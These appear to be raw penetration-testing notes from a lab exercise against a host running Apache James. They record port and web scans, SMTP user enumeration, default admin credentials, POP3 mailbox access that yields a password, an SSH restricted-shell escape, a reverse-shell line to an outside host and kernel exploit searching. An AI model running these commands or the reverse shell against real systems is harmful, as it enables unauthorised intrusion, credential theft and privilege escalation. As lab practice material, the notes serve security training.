nmap -sTVC 10.11.1.72 -Pn > nmap.txt
nmap 10.11.1.72 -p 22,25,80,110,111,119,2049,4555 -sV --reason --dns-server [REDACTED]
gobuster dir  -u http://10.11.1.72/ -w /usr/share/dirb/wordlists/common.txt -x txt,php,py,cgi > gobuster.txt
nikto -h http://10.11.1.72/ > nikto.txt

/usr/share/legion/scripts/smtp-user-enum.pl -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.11.1.72


nmap 10.11.1.72 -p 25 --script=smtp-*
nc -nvC 10.11.1.72 110
root
rpcinfo -s 10.11.1.72
rpcinfo -p 10.11.1.72
nc -nvC 10.11.1.72 119
ls
nc -nv 10.11.1.72 2049
found https://james.apache.org/server/archive/configuration_v2_0.html   default passowrd

nc -nv 10.11.1.72 4555 -C
root root

user: marcus
user: timmy
user: john
user: mailadmin
user: jenny
user: ryuu
user: joe45

for user in   ryuu joe45; do
    ( echo USER ${user}; sleep 2s; echo PASS abcd; sleep 2s; echo LIST; sleep 2s; echo quit) | nc -nvC 10.11.1.72 110;  done

nc -nvC 10.11.1.72 110    ryuu abcd
read the message
RETR 1
RETR 2
username: ryuu
password: QUHqhUPRKXMo4m7k

ssh ryuu@10.11.1.72

ryuu@beta:~$ echo $SHELL
/bin/rbash
ryuu@beta:~$ echo $PATH
/home/ryuu/usr/bin
man -P cat rbash
searchsploit rbash

searchsploit restricted shell
searchsploit apache james   linux/remote/35513.py

cmd="/bin/bash -i >& /dev/tcp/192.168.119.197/443 0>&1"

當前shell還不是互動式shell  用su可以驗證  必須使用python 得到互動式shell才能做後面的提權
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
ryuu@beta:~$ su
su
su: must be run from a terminal

python -c 'import pty; pty.spawn("/bin/bash")'
export PATH="/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games"


cat /etc/*-release
searchsploit linux kernel | grep -v dos | grep ' 3\.' | grep -i 'root\|privilege\|exploit'


gcc 45010.c -o exploit.c